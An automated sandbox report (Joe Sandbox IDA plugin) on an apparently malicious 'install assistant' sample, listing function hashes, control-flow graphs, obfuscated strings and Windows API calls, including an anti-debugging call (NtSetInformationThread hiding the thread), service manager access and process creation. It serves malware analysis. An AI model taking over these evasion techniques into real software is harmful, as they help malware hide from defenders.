                                • Instruction ID: c21962c0f0a6600fc6083fc59e62e79b3d70536324f8ebed65e37f5d182f1a9e
                                • Opcode Fuzzy Hash: 22496e597871edaeb170921646d8ec428c80d212556bb01f350a632f7f15cfa3
                                • Instruction Fuzzy Hash: 6151D132106B018FC3308F28C580785B7A3BFE2314F6A8E5DC0E61BE95DB74B9468B91
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: dcccb8b7abd92f1a7871da50f36b234f985e9760764ed8db05e324df47516cea
                                • Instruction ID: e48f6bce70cc55ac9356c7f352818af49b7f18f144d85f7369618eb7061b651f
                                • Opcode Fuzzy Hash: dcccb8b7abd92f1a7871da50f36b234f985e9760764ed8db05e324df47516cea
                                • Instruction Fuzzy Hash: 3551D132106B018BC330CF28C580796B7A3BFD6364F698E1DC0E65BE95DB74B9468B91
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6C883E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: a8adb62f9e32f4db56a6c0177056c50a1ea42342c81b4a314ad15f791786d446
                                • Instruction ID: 9fa81659726ccdca56c3e5b9bb7a20c76133742d950b68040dd641937acdf139
                                • Opcode Fuzzy Hash: a8adb62f9e32f4db56a6c0177056c50a1ea42342c81b4a314ad15f791786d446
                                • Instruction Fuzzy Hash: C2310232206B018BC330CF24C9947C6B7A3AFA6314F2A8E1DC0A65BE80DB7478098B51
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6C883E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: f474c27126ca599ee4ac8f35c58c8de930a512e8d44e4b5e906189323f07ea64
                                • Instruction ID: 37a1e205a057a7d89dc359048cb39b377a326fe4080764b43acac7fa6513feed
                                • Opcode Fuzzy Hash: f474c27126ca599ee4ac8f35c58c8de930a512e8d44e4b5e906189323f07ea64
                                • Instruction Fuzzy Hash: 8231EF32106B05CBC734CF28C590796B7A6AFA6304F694E1DC0EA5BE85DB71B845CB91
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6C883E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: e0cc55642f0aa5316b77d5914bd14c22f2cc482ec1a5e30e61cad47fc3c6a462
                                • Instruction ID: db741bf809bf3508647732003c562ae94f59275e1502aaa037cbbfead25d64b9
                                • Opcode Fuzzy Hash: e0cc55642f0aa5316b77d5914bd14c22f2cc482ec1a5e30e61cad47fc3c6a462
                                • Instruction Fuzzy Hash: 5521363121AB05CFC334CF24C9A0796B7B7AF92305F258E1DC0A65BE80DB74B8048B91
                                APIs
                                • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA05130
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ManagerOpen
                                • String ID:
                                • API String ID: 1889721586-0
                                • Opcode ID: da37ae074b38d9be5e7c12f3063f4345589ce26a2ef03a7ea1874a96728ddc60
                                • Instruction ID: de3f4cbf51e74d0dac888fefe2d7829a372a3375158e37da91f5e1eb632dca24
                                • Opcode Fuzzy Hash: da37ae074b38d9be5e7c12f3063f4345589ce26a2ef03a7ea1874a96728ddc60
                                • Instruction Fuzzy Hash: FA3149B4708301EFC7109F28D544A1ABBF0EB9A798F54895EF888C7361D331C8889B56
                                APIs
                                • FindFirstFileA.KERNEL32(?,?), ref: 6C9FAEDC
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: ce46de013bd6272e22be422f66af2748e1530aea8d0ecd2e50e8d97c2adaed40
                                • Instruction ID: 72a7abd8c7301e9223993e56fe593892b41eb4e6c88645d461aec9c1eb6e398d
                                • Opcode Fuzzy Hash: ce46de013bd6272e22be422f66af2748e1530aea8d0ecd2e50e8d97c2adaed40
                                • Instruction Fuzzy Hash: 7E1148B4508351AFE7108F28D54451EBBE8BF96314F548E59F4B8CB791DB30CC968B22
                                APIs
                                • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C9DABA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                • API String ID: 2738559852-1563143607
                                • Opcode ID: fd76b181aa2b1c0f5d649491fc6c2c7e73356f7e911f5a03c8d631b25df52d1a
                                • Instruction ID: 3518d04f57d9c1f1ec242cf85e7fa9a78977a02cdad581a67213eaf52326bd2e
                                • Opcode Fuzzy Hash: fd76b181aa2b1c0f5d649491fc6c2c7e73356f7e911f5a03c8d631b25df52d1a
                                • Instruction Fuzzy Hash: B262687060DB818FC724CF18D490A5ABBF2ABD9314F258D1EE999DB750DB34E8468B43

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 6824 6ca1cad3-6ca1cae3 6825 6ca1cae5-6ca1caf8 call 6ca0f9df call 6ca0f9cc 6824->6825 6826 6ca1cafd-6ca1caff 6824->6826 6840 6ca1ce7c 6825->6840 6827 6ca1cb05-6ca1cb0b 6826->6827 6828 6ca1ce64-6ca1ce71 call 6ca0f9df call 6ca0f9cc 6826->6828 6827->6828 6831 6ca1cb11-6ca1cb37 6827->6831 6845 6ca1ce77 call 6ca10120 6828->6845 6831->6828 6834 6ca1cb3d-6ca1cb46 6831->6834 6838 6ca1cb60-6ca1cb62 6834->6838 6839 6ca1cb48-6ca1cb5b call 6ca0f9df call 6ca0f9cc 6834->6839 6843 6ca1ce60-6ca1ce62 6838->6843 6844 6ca1cb68-6ca1cb6b 6838->6844 6839->6845 6846 6ca1ce7f-6ca1ce82 6840->6846 6843->6846 6844->6843 6848 6ca1cb71-6ca1cb75 6844->6848 6845->6840 6848->6839 6851 6ca1cb77-6ca1cb8e 6848->6851 6853 6ca1cb90-6ca1cb93 6851->6853 6854 6ca1cbdf-6ca1cbe5 6851->6854 6857 6ca1cba3-6ca1cba9 6853->6857 6858 6ca1cb95-6ca1cb9e 6853->6858 6855 6ca1cbe7-6ca1cbf1 6854->6855 6856 6ca1cbab-6ca1cbc2 call 6ca0f9df call 6ca0f9cc call 6ca10120 6854->6856 6862 6ca1cbf3-6ca1cbf5 6855->6862 6863 6ca1cbf8-6ca1cc16 call 6ca147f5 call 6ca147bb * 2 6855->6863 6890 6ca1cd97 6856->6890 6857->6856 6860 6ca1cbc7-6ca1cbda 6857->6860 6859 6ca1cc63-6ca1cc73 6858->6859 6865 6ca1cc79-6ca1cc85 6859->6865 6866 6ca1cd38-6ca1cd41 call 6ca219e5 6859->6866 6860->6859 6862->6863 6894 6ca1cc33-6ca1cc5c call 6ca1ac69 6863->6894 6895 6ca1cc18-6ca1cc2e call 6ca0f9cc call 6ca0f9df 6863->6895 6865->6866 6870 6ca1cc8b-6ca1cc8d 6865->6870 6878 6ca1cd43-6ca1cd55 6866->6878 6879 6ca1cdb4 6866->6879 6870->6866 6874 6ca1cc93-6ca1ccb7 6870->6874 6874->6866 6880 6ca1ccb9-6ca1cccf 6874->6880 6878->6879 6885 6ca1cd57-6ca1cd66 GetConsoleMode 6878->6885 6883 6ca1cdb8-6ca1cdd0 ReadFile 6879->6883 6880->6866 6881 6ca1ccd1-6ca1ccd3 6880->6881 6881->6866 6886 6ca1ccd5-6ca1ccfb 6881->6886 6888 6ca1cdd2-6ca1cdd8 6883->6888 6889 6ca1ce2c-6ca1ce37 GetLastError 6883->6889 6885->6879 6891 6ca1cd68-6ca1cd6c 6885->6891 6886->6866 6893 6ca1ccfd-6ca1cd13 6886->6893 6888->6889 6898 6ca1cdda 6888->6898 6896 6ca1ce50-6ca1ce53 6889->6896 6897 6ca1ce39-6ca1ce4b call 6ca0f9cc call 6ca0f9df 6889->6897 6892 6ca1cd9a-6ca1cda4 call 6ca147bb 6890->6892 6891->6883 6899 6ca1cd6e-6ca1cd88 ReadConsoleW 6891->6899 6892->6846 6893->6866 6901 6ca1cd15-6ca1cd17 6893->6901 6894->6859 6895->6890 6908 6ca1cd90-6ca1cd96 call 6ca0f9f2 6896->6908 6909 6ca1ce59-6ca1ce5b 6896->6909 6897->6890 6905 6ca1cddd-6ca1cdef 6898->6905 6906 6ca1cda9-6ca1cdb2 6899->6906 6907 6ca1cd8a GetLastError 6899->6907 6901->6866 6911 6ca1cd19-6ca1cd33 6901->6911 6905->6892 6915 6ca1cdf1-6ca1cdf5 6905->6915 6906->6905 6907->6908 6908->6890 6909->6892 6911->6866 6919 6ca1cdf7-6ca1ce07 call 6ca1cefe 6915->6919 6920 6ca1ce0e-6ca1ce19 6915->6920 6932 6ca1ce0a-6ca1ce0c 6919->6932 6922 6ca1ce25-6ca1ce2a call 6ca1d1b6 6920->6922 6923 6ca1ce1b call 6ca1ce83 6920->6923 6930 6ca1ce20-6ca1ce23 6922->6930 6923->6930 6930->6932 6932->6892
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 83f1658a3ca54e1dc4cb47057d74e7d3083345115b8ee32a1cc94c75a1b2b659
                                • Instruction ID: 602c3e9d6643b320ef8290d0d1e235469119f885202d879f41e474c54b0204e3
                                • Opcode Fuzzy Hash: 83f1658a3ca54e1dc4cb47057d74e7d3083345115b8ee32a1cc94c75a1b2b659
                                • Instruction Fuzzy Hash: 73C10670B082599FDF05DF98C980BADBFB1AF4A31CF144169E414ABF81C7709989CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 6933 6ca2406c-6ca2409c call 6ca244ec 6936 6ca240b7-6ca240c3 call 6ca2160c 6933->6936 6937 6ca2409e-6ca240a9 call 6ca0f9df 6933->6937 6942 6ca240c5-6ca240da call 6ca0f9df call 6ca0f9cc 6936->6942 6943 6ca240dc-6ca24125 call 6ca24457 6936->6943 6944 6ca240ab-6ca240b2 call 6ca0f9cc 6937->6944 6942->6944 6952 6ca24192-6ca2419b GetFileType 6943->6952 6953 6ca24127-6ca24130 6943->6953 6954 6ca24391-6ca24395 6944->6954 6955 6ca241e4-6ca241e7 6952->6955 6956 6ca2419d-6ca241ce GetLastError call 6ca0f9f2 CloseHandle 6952->6956 6958 6ca24132-6ca24136 6953->6958 6959 6ca24167-6ca2418d GetLastError call 6ca0f9f2 6953->6959 6962 6ca241f0-6ca241f6 6955->6962 6963 6ca241e9-6ca241ee 6955->6963 6956->6944 6970 6ca241d4-6ca241df call 6ca0f9cc 6956->6970 6958->6959 6964 6ca24138-6ca24165 call 6ca24457 6958->6964 6959->6944 6967 6ca241fa-6ca24248 call 6ca217b0 6962->6967 6968 6ca241f8 6962->6968 6963->6967 6964->6952 6964->6959 6975 6ca24267-6ca2428f call 6ca24710 6967->6975 6976 6ca2424a-6ca24256 call 6ca24666 6967->6976 6968->6967 6970->6944 6983 6ca24291-6ca24292 6975->6983 6984 6ca24294-6ca242d5 6975->6984 6976->6975 6982 6ca24258 6976->6982 6985 6ca2425a-6ca24262 call 6ca1b925 6982->6985 6983->6985 6986 6ca242f6-6ca24304 6984->6986 6987 6ca242d7-6ca242db 6984->6987 6985->6954 6990 6ca2430a-6ca2430e 6986->6990 6991 6ca2438f 6986->6991 6987->6986 6989 6ca242dd-6ca242f1 6987->6989 6989->6986 6990->6991 6992 6ca24310-6ca24343 CloseHandle call 6ca24457 6990->6992 6991->6954 6996 6ca24377-6ca2438b 6992->6996 6997 6ca24345-6ca24371 GetLastError call 6ca0f9f2 call 6ca2171f 6992->6997 6996->6991 6997->6996
                                APIs
                                  • Part of subcall function 6CA24457: CreateFileW.KERNEL32(00000000,00000000,?,6CA24115,?,?,00000000,?,6CA24115,00000000,0000000C), ref: 6CA24474
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA24180
                                • __dosmaperr.LIBCMT ref: 6CA24187
                                • GetFileType.KERNEL32(00000000), ref: 6CA24193
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA2419D
                                • __dosmaperr.LIBCMT ref: 6CA241A6
                                • CloseHandle.KERNEL32(00000000), ref: 6CA241C6
                                • CloseHandle.KERNEL32(6CA1B0D0), ref: 6CA24313
                                • GetLastError.KERNEL32 ref: 6CA24345
                                • __dosmaperr.LIBCMT ref: 6CA2434C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: 8Q
                                • API String ID: 4237864984-4022487301
                                • Opcode ID: 2145fe1653c8e00ba17596cfc5722001625565f6ee65336e8249b18c4b0adc80
                                • Instruction ID: 1ab992d42adf9783b0749792c2afc9a5755d8e19f54583e7885ab9b43dadfde4
                                • Opcode Fuzzy Hash: 2145fe1653c8e00ba17596cfc5722001625565f6ee65336e8249b18c4b0adc80
                                • Instruction Fuzzy Hash: EEA14B32A045689FCF098F68DC517AE7BB1AB47328F1C425DE811EF790C739889ACB55

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7002 6c9dc1e0-6c9dc239 call 6ca06b70 7005 6c9dc260-6c9dc269 7002->7005 7006 6c9dc26b-6c9dc270 7005->7006 7007 6c9dc2b0-6c9dc2b5 7005->7007 7008 6c9dc2f0-6c9dc2f5 7006->7008 7009 6c9dc272-6c9dc277 7006->7009 7010 6c9dc2b7-6c9dc2bc 7007->7010 7011 6c9dc330-6c9dc335 7007->7011 7014 6c9dc2fb-6c9dc300 7008->7014 7015 6c9dc431-6c9dc448 WriteFile 7008->7015 7018 6c9dc27d-6c9dc282 7009->7018 7019 6c9dc372-6c9dc3df WriteFile 7009->7019 7012 6c9dc407-6c9dc41b 7010->7012 7013 6c9dc2c2-6c9dc2c7 7010->7013 7016 6c9dc489-6c9dc4b9 call 6ca0b3a0 7011->7016 7017 6c9dc33b-6c9dc340 7011->7017 7029 6c9dc41f-6c9dc42c 7012->7029 7020 6c9dc2cd-6c9dc2d2 7013->7020 7021 6c9dc23b-6c9dc250 7013->7021 7022 6c9dc306-6c9dc30b 7014->7022 7023 6c9dc452-6c9dc47f call 6ca0b920 ReadFile 7014->7023 7015->7023 7016->7005 7025 6c9dc4be-6c9dc4c3 7017->7025 7026 6c9dc346-6c9dc36d 7017->7026 7027 6c9dc3e9-6c9dc3fd WriteFile 7018->7027 7028 6c9dc288-6c9dc28d 7018->7028 7019->7027 7020->7005 7030 6c9dc2d4-6c9dc2e7 7020->7030 7033 6c9dc253-6c9dc258 7021->7033 7022->7005 7032 6c9dc311-6c9dc32b 7022->7032 7023->7016 7025->7005 7035 6c9dc4c9-6c9dc4d7 7025->7035 7026->7033 7027->7012 7028->7005 7036 6c9dc28f-6c9dc2aa 7028->7036 7029->7005 7030->7033 7032->7029 7033->7005 7036->7033
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: :uW$;uW$;uW$> 4!$> 4!
                                • API String ID: 0-4100612575
                                • Opcode ID: 16a426276503846efdfaf458e91ee4c04494b42be0960f20880a0ddefb25c5c6
                                • Instruction ID: c59222ae607cceaf44dc0195660e4b6aaa3879ea352ddd6bea298a7231377301
                                • Opcode Fuzzy Hash: 16a426276503846efdfaf458e91ee4c04494b42be0960f20880a0ddefb25c5c6
                                • Instruction Fuzzy Hash: AE719FB0208785AFD710DF54C480B5ABBF4FF8A708F11892EF599E7650D771E8889B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: K?Jo$K?Jo$`Rlx$7eO
                                • API String ID: 0-174837320
                                • Opcode ID: 1e0d18f65f419d2cc0d3cca6d6244551af1182f730d3a10618be0608c5f35a76
                                • Instruction ID: b9b5975373d64a2e4bbd618be5a2ef132aa1712caf250b1012e4393c23c20c02
                                • Opcode Fuzzy Hash: 1e0d18f65f419d2cc0d3cca6d6244551af1182f730d3a10618be0608c5f35a76
                                • Instruction Fuzzy Hash: 3D4257B86097428FC754CF18C090A2ABBF1AFC9754F258E1EE599A7B20D734E845CB53
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: ;T55
                                • API String ID: 0-2572755013
                                • Opcode ID: 6d446f206a182681b63a205e2afeac7a36ec6a724c282898dd154b2d08f20d21
                                • Instruction ID: 1dddb5b2454ad61c0909fe3b31179102ffb5f32e76758af05a8c88dbd73f9f5a
                                • Opcode Fuzzy Hash: 6d446f206a182681b63a205e2afeac7a36ec6a724c282898dd154b2d08f20d21
                                • Instruction Fuzzy Hash: 0803C232645B018FC738CF2CC9D0696B7E3AFD53287198E6DC0A64BA95DB74B44ACB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7579 6ca04ff0-6ca05077 CreateProcessA 7580 6ca050ca-6ca050d3 7579->7580 7581 6ca050f0-6ca0510b 7580->7581 7582 6ca050d5-6ca050da 7580->7582 7581->7580 7583 6ca05080-6ca050c2 WaitForSingleObject CloseHandle * 2 7582->7583 7584 6ca050dc-6ca050e1 7582->7584 7583->7580 7584->7580 7585 6ca050e3-6ca05118 7584->7585
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: D
                                • API String ID: 963392458-2746444292
                                • Opcode ID: 47a70539484ea61a4517adfb9bcce3fb8496d2cf7f5a9e89d9e364f183d6797c
